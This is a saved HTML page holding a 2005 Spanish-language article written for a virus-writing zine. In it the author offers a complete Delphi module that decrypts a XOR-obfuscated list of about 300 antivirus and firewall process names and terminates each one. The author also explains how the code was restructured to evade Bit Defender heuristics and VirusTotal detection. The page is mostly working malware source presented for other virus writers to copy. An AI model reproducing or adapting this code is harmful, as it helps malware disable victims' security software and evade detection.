<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0242)http://64.4.30.250/cgi-bin/getmsg/Articulokill-av.htm?curmbox=F000000001&a=f493299720ef6c968f081ec16701d2ef&msg=MSG1112134278.15&start=1311545&len=13752&mimepart=3&disk=64.4.30.72_d230&login=srmuerte77&domain=hotmail%2ecom&_lang=ES&country=US -->
<HTML><HEAD><TITLE>Untitled Document</TITLE>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<META content="MSHTML 6.00.2800.1479" name=GENERATOR></HEAD>
<BODY text=#000000 bgColor=#ffffff>Ocultar AV-Killer dentro de los 
antivirus<BR>----------------------------------------- 
<P><BR>Escrito para Mitosis 3 por Pana_Infierno</P>
<P>Hace algun tiempo he sacado de mis virus el modulo donde destruyo los 
procesos<BR>en memoria de un listado de antivirus y firewals porque al menos un 
antivirus<BR>(Bit Defender 7.2) me detectaba este modulo inhabilitando mi 
virus.<BR>Despues de experimentar y modificar el algoritmo muchas veces sin 
resultados<BR>positivos al fin desarrolle un simple algoritmo que hace el mismo 
trabajo que<BR>el antiguo pero de otra forma, por el cual el modulo heuristico 
no lo detecta<BR>como "BehavesLike:Win32.Av-Killer", el antivirus en cuestion es 
el<BR>Bit Defender 7.2,el codigo terminado ha sido testeado y probado con 
este<BR>antivirus sacandolo de memoria, tambien ha sacando de memoria el 
firewall de<BR>norton 2003, y a sido esacaneado en virus total sin ninguna 
deteccion.</P>
<P>Este no es un virus en si solo, quiero mostrar el codigo para que sea 
implementado.<BR>Tratare de explicar algunas partes de este codigo aunque no es 
necesario.</P>
<P>Un saludo a Kurgan por las ideas prestadas.</P>
<P>//------------------------------Copiar dede 
aca-------------------------------------<BR>program HideKillAv;</P>
<P>uses<BR>SysUtils,<BR>Windows,<BR>TLHelp32;</P>
<P><BR>//Lista de antivirus no encriptados</P>
<P>//const AVS: array[0..301] of String =<BR>//('avp32.exe', 'avpmon.exe', 
'zonealarm.exe', 'vshwin32.exe', 'vet95.exe', 'tbscan.exe', 'serv95.exe', 
'Nspclean.exe', 'clrav.com','scan32.exe', 'rav7.exe', 'navw.exe', 'outpost.exe', 
'nmain.exe', 'navnt.exe', 'mpftray.exe','lockdown2000.exe', 'icssuppnt.exe', 
'icload95.exe', 'iamapp.exe', 'findviru.exe', 'f-agnt95.exe', 
'dv95.exe','dv95_o.exe', 'claw95ct.exe', 'cfiaudit.exe', 'avwupd32.exe', 
'avptc32.exe', '_avp32.exe', 'avgctrl.exe','apvxdwin.exe', '_avpcc.exe', 
'avpcc.exe', 'wfindv32.exe', 'vsecomr.exe', 'tds2-nt.exe', 'sweep95.exe', 
'EFINET32.EXE','scrscan.exe', 'safeweb.exe', 'persfw.exe', 'navsched.exe', 
'nvc95.exe', 'nisum.exe', 'navlu32.exe', 'ALOGSERV', 'AMON9X', 'AVGSERV9', 
'AVGW', 'avkpop', 'avkservice', 'AvkServ', 'avkwctl9', 'AVXMONITOR9X', 
'AVXMONITORNT', 'AVXQUAR','moolive.exe', 'jed.exe', 'icsupp95.exe', 
'ibmavsp.exe', 'frw.exe', 'f-stopw.exe', 'espwatch.exe', 'procexp', 
'filemon.exe', 'regmon.exe','dvp95.exe', 'cfiadmin.exe', 'avwin95.exe', 
'avpm.exe', 'avp.exe',<BR>//'ave32.exe','anti-trojan.exe', 'webscan.exe', 
'webscanx.exe', 'vsscan40.exe', 'tds2-98.exe', 'SymProxySvc', 'SYMTRAY', 
'TAUMON', 'TCM', 'TDS-3', 'TFAK', 'vbcmserv', 'VbCons', 'VIR-HELP', 'VPC32', 
'VPTRAY', 'VSMAIN', 'vsmon', 'WIMMUN32', 'WGFE95', 'WEBTRAP', 'WATCHDOG', 
'WrAdmin','sphinx.exe', 'scanpm.exe','rescue.exe', 'pcfwallicon.exe', 
'pavcl.exe', 'nupgrade.exe', 'navwnt.exe', 'navapw32.exe', 
'luall.exe','iomon98.exe', 'icmoon.exe', 'fprot.exe', 'f-prot95.exe', 
'esafe.exe', 'cleaner3.exe', 'IBMASN.EXE', 'AVXW', 'cfgWiz', 'CMGRDIAN', 
'CONNECTIONMONITOR', 'CPDClnt', 'DEFWATCH', 'CTRL', 'defalert', 'defscangui', 
'DOORS', 'EFPEADM', 'ETRUSTCIPE', 'EVPN', 'EXPERT', 'fameh32', 'fch32', 
'fih32',<BR>//'blackice.exe', 'avsched32.exe', 'avpdos32.exe', 'avpnt.exe', 
'avconsol.exe', 'ackwin32.exe', 'NWTOOL16', 'pccwin97', 'PROGRAMAUDITOR', 
'POP3TRAP', 'PROCESSMONITOR', 'PORTMONITOR', 'POPROXY', 'pcscan', 'pcntmon', 
'pavproxy', 'PADMIN', 'pview95', 'rapapp.exe', 'REALMON', 
'RTVSCN95','vsstat.exe', 'vettray.exe', 'tca.exe', 'smc.exe', 'scan95.exe', 
'rav7win.exe', 'pccwin98.exe', 'KPFW32.EXE', 'ADVXDWIN','padmin.exe', 
'normist.exe', 'navw32.exe', 'n32scan.exe', 'lookout.exe', 'iface.exe', 
'icloadnt.exe', 'SPYXX', 'SS3EDIT', 'SweepNet','iamserv.exe', 'fp-win.exe', 
'f-prot.exe', 'ecengine.exe', 'cleaner.exe', 'cfind.exe', 'blackd.exe', 
'RULAUNCH', 'sbserv', 'SWNETSUP', 'WrCtrl','avpupd.exe', 'avkserv.exe', 
'autodown.exe', '_avpm.exe', 'avpm.exe', 'regedit.exe', 'msconfig.exe', 
'FPROT95.EXE', 'IBMASN.EXE','sfc.exe', 'regedt32.exe', 'offguard.exe', 
'pav.exe', 'pavmail.exe', 'per.exe', 'perd.exe','pertsk.exe',<BR>//'perupd.exe', 
'pervac.exe', 'pervacd.exe', 'th.exe', 'th32.exe', 'th32upd.exe','thav.exe', 
'thd.exe', 'thd32.exe', 'thmail.exe', 'alertsvc.exe', 'amon.exe', 
'kpf.exe','antivir', 'avsynmgr.exe', 'cfinet.exe', 'cfinet32.exe', 'icmon.exe', 
'lockdownadvanced.exe','lucomserver.exe', 'mcafee', 'navapsvc.exe', 
'navrunr.exe', 'nisserv.exe','nsched32.exe', 'pcciomon.exe', 'pccmain.exe', 
'pview95.exe', 'Avnt.exe', 'Claw95cf.exe', 'Dvp95_0.exe', 'Vscan40.exe', 
'Icsuppnt.exe', 'Jedi.exe', 'N32scanw.exe', 'Pavsched.exe', 'Pavw.exe', 
'Avrep32.exe', 'Monitor.exe','fsgk32', 'fsm32', 'fsma32', 'fsmb32', 'gbmenu', 
'GBPOLL', 'GENERICS', 'GUARD', 'IAMSTATS', 'ISRV95', 'LDPROMENU', 'LDSCAN', 
'LUSPT', 'MCMNHDLR', 'MCTOOL', 'MCUPDATE', 'MCVSRTE', 'MGHTML', 'MINILOG', 
'MCVSSHLD', 'MCAGENT', 'MPFSERVICE', 'MWATCH', 'NeoWatchLog',<BR>//'NVSVC32', 
'NWService', 'NTXconfig', 'NTVDM', 'ntrtscan', 'npssvc', 'npscheck', 'netutils', 
'ndd32', 'NAVENGNAVEX15','notstart.exe', 'zapro.exe', 'pqremove.com', 
'BullGuard', 'CCAPP.EXE', 'vet98.exe', 'VET32.EXE', 'VCONTROL.EXE', 
'claw95.exe', 'ANTS', 'ATCON', 'ATUPDATER', 'ATWATCH', 'AutoTrace', 'AVGCC32', 
'AvgServ', 'AVWINNT', 'fnrb32', 'fsaa', 'fsav32', 'ZAP.EXE', 'ZAPD.EXE', 
'ZAPPRG.EXE', 'ZAPS.EXE', 'ZCAP.EXE', 'pfwagent.exe', 
'pfwcon.exe','bdmcon.exe','bdnagent.exe','bdswitch.exe','bdss.exe','bdswitch.exe','bdmcon.exe');</P>
<P><BR>//Nosotros usaremos la lista encriptada porque algunos antivirus pueden 
detectar una lista de nombres<BR>//sin encpriptar como la de arriba con la lista 
encriptada el antivirus no sabe que contendra<BR>//el arreglo con los avs</P>
<P>CONST AVS1:array[0..301] of 
string=<BR>('fqw45)bb','fqwjhi)bb','}hibfkfuj)bb','qtopni45)bb','qbs&gt;2)bb','setdfi)bb','tbuq&gt;2)bb','Itwdkbfi)bb','dkufq)dhj','tdfi45)bb','ufq0)bb','ifqp)bb','hrswhts)bb','ijfni)bb','ifqis)bb','jwasuf~)bb','khdlchpi5777)bb','ndttrwwis)bb','ndkhfc&gt;2)bb','nfjfww)bb','anicqnur)bb','a*f`is&gt;2)bb','cq&gt;2)bb','cq&gt;2Xh)bb','dkfp&gt;2ds)bb','danfrcns)bb','fqprwc45)bb','fqwsd45)bb','Xfqw45)bb','fq`dsuk)bb','fwqcpni)bb','Xfqwdd)bb','fqwdd)bb','panicq45)bb','qtbdhju)bb','sct5*is)bb','tpbbw&gt;2)bb','BANIBS45)B_B','tdutdfi)bb','tfabpbe)bb','wbutap)bb','ifqtdobc)bb','iqd&gt;2)bb','intrj)bb','ifqkr45)bb','FKH@TBUQ','FJHI&gt;_','FQ@TBUQ&gt;','FQ@P','fqlwhw','fqltbuqndb','FqlTbuq','fqlpdsk&gt;','FQ_JHINSHU&gt;_','FQ_JHINSHUIS','FQ_VRFU','jhhknqb)bb','mbc)bb','ndtrww&gt;2)bb','nejfqtw)bb','aup)bb','a*tshwp)bb','btwpfsdo)bb','wuhdbw','ankbjhi)bb','ub`jhi)bb','cqw&gt;2)bb','danfcjni)bb','fqpni&gt;2)bb','fqwj)bb','fqw)bb','fqb45)bb','fisn*suhmfi)bb','pbetdfi)bb','pbetdfi)bb','qttdfi37)bb',<BR>'sct5*&gt;?)bb','T~jWuh~Tqd','T^JSUF^','SFRJHI','SDJ','SCT*4','SAFL','qedjtbuq','QeDhit','QN/U*OBKW','QWD45','QWSUF^','QTJFNI','qtjhi','PNJJRI45','P@AB&gt;2','PBESUFW','PFSDOCH@','PuFcjni','twoni)bb','tdfiwj)bb','ubtdrb)bb','wdapfkkndhi)bb','wfqdk)bb','irw`ufcb)bb','ifqpis)bb','ifqfwp45)bb','krfkk)bb','nhjhi&gt;?)bb','ndjhhi)bb','awuhs)bb','a*wuhs&gt;2)bb','btfab)bb','dkbfibu4)bb','NEJFTI)B_B','FQ_P','da`Pn}','DJ@UCNFI','DHIIBDSNHIJHINSHU','DWCDkis','CBAPFSDO','DSUK','cbafkbus','cbatdfi`rn','CHHUT','BAWBFCJ','BSURTSDNWB','BQWI','B_WBUS','afjbo45','ado45','ano45','ekfdlndb)bb','fqtdobc45)bb','fqwcht45)bb','fqwis)bb','fqdhithk)bb','fdlpni45)bb','IPSHHK61','wddpni&gt;0','WUH@UFJFRCNSHU','WHW4SUFW','WUHDBTTJHINSHU','WHUSJHINSHU','WHWUH_^','wdtdfi','wdisjhi','wfqwuh~','WFCJNI','wqnbp&gt;2','ufwfww)bb','UBFKJHI','USQTDI&gt;2','qttsfs)bb','qbssuf~)bb','sdf)bb','tjd)bb','tdfi&gt;2)bb','ufq0pni)bb','wddpni&gt;?)bb','LWAP45)B_B','FCQ_CPNI','wfcjni)bb','ihujnts)bb','ifqp45)bb','i45tdfi)bb',<BR>'khhlhrs)bb','nafdb)bb','ndkhfcis)bb','TW^__','TT4BCNS','TpbbwIbs','nfjtbuq)bb','aw*pni)bb','a*wuhs)bb','bdbi`nib)bb','dkbfibu)bb','danic)bb','ekfdlc)bb','URKFRIDO','tetbuq','TPIBSTRW','PuDsuk','fqwrwc)bb','fqltbuq)bb','frshchpi)bb','Xfqwj)bb','fqwj)bb','ub`bcns)bb','jtdhian`)bb','AWUHS&gt;2)B_B','NEJFTI)B_B','tad)bb','ub`bcs45)bb','haa`rfuc)bb','wfq)bb','wfqjfnk)bb','wbu)bb','wbuc)bb','wbustl)bb','wburwc)bb','wbuqfd)bb','wbuqfdc)bb','so)bb','so45)bb','so45rwc)bb','sofq)bb','soc)bb','soc45)bb','sojfnk)bb','fkbustqd)bb','fjhi)bb','lwa)bb','fisnqnu','fqt~ij`u)bb','danibs)bb','danibs45)bb','ndjhi)bb','khdlchpifcqfidbc)bb','krdhjtbuqbu)bb','jdfabb','ifqfwtqd)bb','ifquriu)bb','inttbuq)bb','itdobc45)bb','wddnhjhi)bb','wddjfni)bb','wqnbp&gt;2)bb','Fqis)bb','Dkfp&gt;2da)bb','Cqw&gt;2X7)bb','Qtdfi37)bb','Ndtrwwis)bb','Mbcn)bb','I45tdfip)bb','Wfqtdobc)bb','Wfqp)bb','Fqubw45)bb','Jhinshu)bb','at`l45','atj45','atjf45','atje45','`ejbir','@EWHKK','@BIBUNDT',<BR>'@RFUC','NFJTSFST','NTUQ&gt;2','KCWUHJBIR','KCTDFI','KRTWS','JDJIOCKU','JDSHHK','JDRWCFSB','JDQTUSB','J@OSJK','JNINKH@','JDQTTOKC','JDF@BIS','JWATBUQNDB','JPFSDO','IbhPfsdoKh`','IQTQD45','IPTbuqndb','IS_dhian`','ISQCJ','isustdfi','iwttqd','iwtdobdl','ibsrsnkt','icc45','IFQBI@IFQB_62','ihstsfus)bb','}fwuh)bb','wvubjhqb)dhj','Erkk@rfuc','DDFWW)B_B','qbs&gt;?)bb','QBS45)B_B','QDHISUHK)B_B','dkfp&gt;2)bb','FIST','FSDHI','FSRWCFSBU','FSPFSDO','FrshSufdb','FQ@DD45','Fq`Tbuq','FQPNIIS','aiue45','atff','atfq45',']FW)B_B',']FWC)B_B',']FWWU@)B_B',']FWT)B_B',']DFW)B_B','wapf`bis)bb','wapdhi)bb','ecjdhi)bb','ecif`bis)bb','ectpnsdo)bb','ectt)bb','ectpnsdo)bb','ecjdhi)bb');</P>
<P>var<BR>i:integer;</P>
<P>//Esta rutina desencripta una cadena con xor</P>
<P>Function 
E(Texto:string;Clave:integer):string;<BR>var<BR>Nuevo:string;<BR>Largo,I:Integer;<BR>begin<BR>Largo 
:= strLen(PChar(Texto));<BR>For i := 1 to Largo do<BR>begin<BR>Nuevo := Nuevo + 
chr(ord(Texto[i]) xor Clave);<BR>end;<BR>E := Nuevo;<BR>end;</P>
<P>//Funcion para cortar procesos de memoria conociendo el nombre del 
ejecutable<BR>//extraida de otro virus no recuerdo el nombre, pero implementada 
inicialmente<BR>//en truco mania</P>
<P>FUNCTION Asesinar(archivo: string): 
integer;<BR>CONST<BR>Terminar_proceso=$0001;<BR>VAR<BR>CLP: BOOL;<BR>Lahandle: 
THandle;<BR>Procesos32: TProcessEntry32;<BR>Begin<BR>Result := 0;<BR>Lahandle := 
CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);<BR>Procesos32.dwSize := 
Sizeof(Procesos32);<BR>CLP := Process32First(lahandle,Procesos32);<BR>while 
integer(CLP) &lt;&gt; 0 DO Begin<BR>IF 
((UpperCase(ExtractFileName(Procesos32.szExeFile)) = UpperCase(archivo)) 
Or<BR>(UpperCase(Procesos32.szExeFile) = UpperCase(archivo))) then<BR>Result := 
Integer(TerminateProcess(OpenProcess(Terminar_proceso,BOOL(0),Procesos32.th32ProcessID), 
0));<BR>CLP := 
Process32Next(lahandle,Procesos32);<BR>End;<BR>CloseHandle(lahandle);<BR>END;</P>
<P><BR>//Aca esta el simple cambio a la rutina que la hace diferente frenta a la 
heuristica.</P>
<P>Procedure matar(ii:integer);<BR>begin<BR>Asesinar(E(AVS1[ii],7));<BR>// 
Asesinar(AVS[ii]); //esta linea la usaremos en el caso de usar la lista 
de<BR>//antivirus sin encriptar<BR>end;</P>
<P>begin<BR>//--------------------------- Antiguo Metodo 
----------------------------------------<BR>//Este es el antiguo metodo que 
usaba, he provado con muchas variaciones pero no<BR>//lograba 
resultados.<BR>//Si usaramos este metodo la heuristica detectaria que queremos 
cortar una lista<BR>//de archivos porque detecta un ciclo repetitivo no importa 
cual.</P>
<P>{For i:=0 to 301 do<BR>begin<BR>// Asesinar(AVS[i]); //para usar con lista 
desencriptada<BR>// 
Asesinar(E(AVS1[i],7));<BR>end;}<BR>//------------------------------------------------------------------------------------</P>
<P>//Con este otro metodo y una modificacion a las funciones logramos que los 
antivirus<BR>//no detecten cuando queremos matar varios exes dentro de un ciclo 
llamando varias<BR>//veces a la funcion que mata los procesos y pasandole el 
puntero del arreglo</P>
<P>For i:=0 to 301 do<BR>begin<BR>matar(i);<BR>end;</P>
<P>end.<BR>//----------------------------- Hasta Aca 
-----------------------------------------------</P>
<P>Facil y eficiente codigo escrito en Chile para Mitosis 3<BR>by</P>
<P><BR>Pana_Infierno/GEDZAC - 2005<BR></P>
<P>Pana_Infierno@hotmail.com<BR></P></BODY></HTML>
